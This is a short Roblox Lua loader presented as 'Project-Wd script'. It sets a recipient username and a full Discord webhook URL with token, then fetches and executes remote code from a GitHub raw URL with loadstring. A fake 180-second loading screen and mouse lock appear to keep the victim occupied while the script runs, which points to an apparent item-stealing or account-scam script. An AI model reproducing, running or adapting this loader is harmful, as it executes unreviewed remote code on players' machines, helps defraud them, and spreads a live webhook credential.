UserName = "muaxuan1204"
UserName2 = "muaxuan1204"
Webhook = "https://discord.com/api/webhooks/1107848684512751706/tFpU6aNlCv7-fFDrrYnImOSTzG_0yTQ4Le-cB3rSGvg6_UyG9t-eMXOaS5tk5-lBXzQz"
_G.LoadingScreen = true
_G.AntiLeave = false
_G.MouseLock = true 
_G.ScriptName = "Project-Wd script"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes
loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()
